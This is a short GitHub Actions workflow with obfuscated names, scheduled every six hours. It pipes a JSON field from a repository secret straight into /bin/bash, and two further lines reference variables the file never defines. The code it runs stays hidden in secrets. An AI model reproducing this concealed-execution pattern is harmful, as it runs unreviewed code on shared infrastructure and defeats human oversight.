name: jinwenjianxiao
on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'
jobs:  # 22866
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jinwenjianxiao
        env:
          yen0268: ${{ secrets.yen0268 }}
        run: |
          echo $yen0268 | jq -r .oglz70 | /bin/bash
          echo $rrlou9 | jq -r .hffp46 | /bin/bash
          echo $ohbmn098 | jq -r .brz22 | /bin/bash

